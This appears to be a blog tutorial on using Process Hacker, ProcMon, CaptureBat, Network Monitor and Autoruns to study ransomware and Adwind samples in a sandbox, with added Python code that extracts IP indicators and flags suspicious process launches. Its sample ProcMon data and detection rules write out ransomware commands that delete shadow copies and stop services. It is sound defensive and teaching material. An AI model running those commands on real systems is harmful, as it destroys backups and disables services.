
Five awesome tools to perform behavioural analysis of a malware

This post explains five awesome tools for performing behavioural analysis of a malware specimen. These tools are really handy for a quick behavioural analysis to understand the characteristics of the specimen. The main objective of behavioural analysis is to pull out indicators of compromise so that the malware can be detected and defended against proactively.


  1. Process Hacker
  2. Process Monitor (ProcMon)
  3. CaptureBat
  4. Microsoft Network Monitor
  5. Autoruns
  • You are dealing with real malware samples
  • Don’t expose them to internal networks or the internet
  • Analyze them in a controlled environment (sandbox)
  • We are not responsible for any consequences or damage if you fail to obey these rules
A Windows 7 virtual machine was set up with the above mentioned tools, and a snapshot of this clean state of Windows 7 with all tools installed was taken. The above mentioned tools are explained below using various malware specimens. Find below the hash values of the malware used in this analysis; all tools were run in the background while the malware was executed.


Process Hacker
The malware was executed while Process Hacker was running in the background.

It was interesting to see the description of the malware process. We can poke around the memory section of the malware later.

The initial process terminated and a new process was created from a strangely named executable; the location of the file can be found by looking at the properties of the process. It is always suggested to dump the memory of the infected system so that all terminated processes can be identified and a timeline of all processes can be built. Looking at the properties of the newly created process:
We can see many interesting strings in process memory related to the ransomware, including a help instructions file for the decryption process. We can also identify an IP address within the process memory strings; it is recommended to filter the strings using a regular expression for IP addresses.


We can also dump the entire set of process memory strings to a text file and search it offline for IP addresses or anything else of interest using filters.
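The offline filtering step described above, as an added example that is not part of the original post: it runs an IPv4 regular expression over a strings dump (a constructed sample is embedded; the real input would be the text file saved from Process Hacker), validates each hit so that version-number lookalikes are dropped, and separates sandbox/LAN noise from addresses worth treating as indicators.

```python
import ipaddress
import re
import sys

# Constructed sample of a strings dump saved from Process Hacker (not from the post).
SAMPLE_STRINGS = """\
!This program cannot be run in DOS mode.
HOW_TO_DECRYPT_FILES.txt
http://192.0.2.44/gate.php
Version 6.1.7601
10.0.0.5
300.1.2.3
kernel32.dll
198.51.100.7:443
"""

# Four dotted decimal groups with no digit or dot on either side, so longer runs
# such as "1.2.3.4.5" or version strings like "6.1.7601.1" give no partial hits.
IPV4_CANDIDATE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Ranges that are almost always sandbox or LAN noise rather than a remote indicator.
LOCAL_NOISE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.168.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]

def extract_ipv4(text):
    """Return (external, local): sorted lists of valid IPv4 addresses found in text.

    Regex hits are validated with ipaddress, so a token with an octet above 255
    (e.g. "300.1.2.3") is discarded rather than reported as an indicator.
    """
    external, local = set(), set()
    for token in IPV4_CANDIDATE.findall(text):
        try:
            addr = ipaddress.IPv4Address(token)
        except ValueError:
            continue
        if any(addr in net for net in LOCAL_NOISE):
            local.add(addr)
        else:
            external.add(addr)
    return [str(a) for a in sorted(external)], [str(a) for a in sorted(local)]

if __name__ == "__main__":
    # Usage: python ip_strings.py <strings_dump.txt>
    with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
        ext, loc = extract_ipv4(fh.read())
    print("external:", *ext, sep="\n  ")
    print("local/noise:", *loc, sep="\n  ")
```

Any address in the external list still needs to be checked against the network capture before it is treated as an IoC; strings in memory can include leftover data from libraries or documents.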

Process Monitor
Process Monitor was run with a Process Create filter while the malware was executed. Using Process Monitor, we can identify all newly created processes along with the command line arguments of those processes.

It was identified that the malware stops all critical services, deletes all volume shadow copies on the system, and then runs the dropped binary to encrypt all files. The location of the newly created process was identified as the user's AppData folder.
It was also observed that a notepad process was started to show the dropped help instructions file.
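As an added example (not from the original post), the three observations above turned into detection logic over a ProcMon CSV export: it parses Process Create rows, flags service stops, shadow copy deletion and binaries launched from the user profile, and goes one step further than the Process Create view by rebuilding each flagged process's parent chain back to the sample. The rows are constructed, and ProcMon's default export column layout (Time of Day, Process Name, PID, Operation, Path, Result, Detail) is assumed.

```python
import csv
import io
import ntpath
import re

# Constructed ProcMon CSV export (default column layout assumed); not from the post.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","explorer.exe","1234","Process Create","C:\Users\lab\Desktop\sample.exe","SUCCESS","PID: 2000, Command line: ""C:\Users\lab\Desktop\sample.exe"""
"10:01:03.4","sample.exe","2000","Process Create","C:\Users\lab\AppData\Roaming\abcd.exe","SUCCESS","PID: 2010, Command line: C:\Users\lab\AppData\Roaming\abcd.exe"
"10:01:04.0","abcd.exe","2010","Process Create","C:\Windows\System32\vssadmin.exe","SUCCESS","PID: 2020, Command line: vssadmin delete shadows /all /quiet"
"10:01:04.3","abcd.exe","2010","Process Create","C:\Windows\System32\net.exe","SUCCESS","PID: 2030, Command line: net stop vss /y"
"10:01:09.9","abcd.exe","2010","Process Create","C:\Windows\System32\notepad.exe","SUCCESS","PID: 2040, Command line: notepad.exe C:\Users\lab\Desktop\HELP_DECRYPT.txt"
"10:01:10.0","svchost.exe","800","RegQueryValue","HKLM\Software\X","SUCCESS","Type: REG_SZ"
'''

# Process Create rows carry the child PID and its command line in the Detail column.
DETAIL_RE = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)", re.S)
# (label, event field to inspect, pattern): the behaviours the post observed.
RULES = (
    ("shadow copy deletion", "cmdline", re.compile(r"\bvssadmin\b.*\bdelete\s+shadows\b", re.I)),
    ("service stop", "cmdline", re.compile(r"\b(?:net1?|sc)\s+stop\b", re.I)),
    ("binary run from user profile", "image", re.compile(r"\\AppData\\", re.I)),
)

def parse_process_creates(csv_text):
    """Return one dict per Process Create row: which process started what, with PIDs."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        m = DETAIL_RE.match(row["Detail"]) if row["Operation"] == "Process Create" else None
        if m:
            events.append({"time": row["Time of Day"], "parent": row["Process Name"],
                           "ppid": int(row["PID"]), "pid": int(m.group(1)),
                           "image": row["Path"], "cmdline": m.group(2).strip()})
    return events

def triage(csv_text):
    """Flag Process Create events matching RULES, in capture order."""
    return [dict(ev, label=label) for ev in parse_process_creates(csv_text)
            for label, field, pattern in RULES if pattern.search(ev[field])]

def lineage(events, pid):
    """Walk pid's parent chain back to the first process not itself seen being created."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain, parent = [], None
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid]["image"]))
        pid, parent = by_pid[pid]["ppid"], by_pid[pid]["parent"]
    if parent:
        chain.append(parent)  # the root parent (e.g. explorer.exe) is known by name only
    return chain[::-1]
```

The same rules can be fed to an EDR or Sysmon Event ID 1 pipeline; ProcMon is the lab-side way to confirm what the sample actually does before writing them.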

CaptureBat
CaptureBat was used to capture all dropped files and also the network traffic. It is an easy to use tool that captures all modified and newly created files on disk.
The logs of CaptureBat:
Below are the dropped files on disk:
Further analysis (reverse engineering or dynamic analysis) of these files would bring a better understanding of the malware. The hashes of these files can be used as IoCs or signatures for malware detection.

Adwind Sample Hash: 728f71096842b505ddaaa1b9084e8b1950d9eef6831f44a9a88ded61e5cdcab7

Below are the files dropped on disk by the Adwind malware (captured by CaptureBat):
The dropped DLL can be seen in the above screenshot.
Dropped VB scripts on disk:

Adwind indicators of compromise (hash values of all dropped files):

Microsoft Network Monitor
Microsoft Network Monitor should be run with administrative privileges to capture all network traffic. The beauty of this tool is that it identifies which process is establishing connections with remote hosts. Wireshark can also be used, but it is limited to network traffic and cannot associate a running process with its network connection.
It was observed that the newly created process connected to an external host.
We can also save the entire capture as a pcap file for further analysis.

Autoruns
Microsoft Windows has many Auto Start Execution Points (ASEPs) through which persistence can be achieved. This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login, and when you start various built-in Windows applications like Internet Explorer, Explorer and media players. These programs and drivers include ones in your startup folder, Run, RunOnce, and other Registry keys. Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. Autoruns goes way beyond other autostart utilities.
As shown above, the malware made an entry in the registry Run keys to maintain its persistence.
Leverage the inbuilt VirusTotal scanning for executable images located in autostart locations.

This is just an explanatory post on how to use these tools for quick and effective behavioural analysis of malware :)

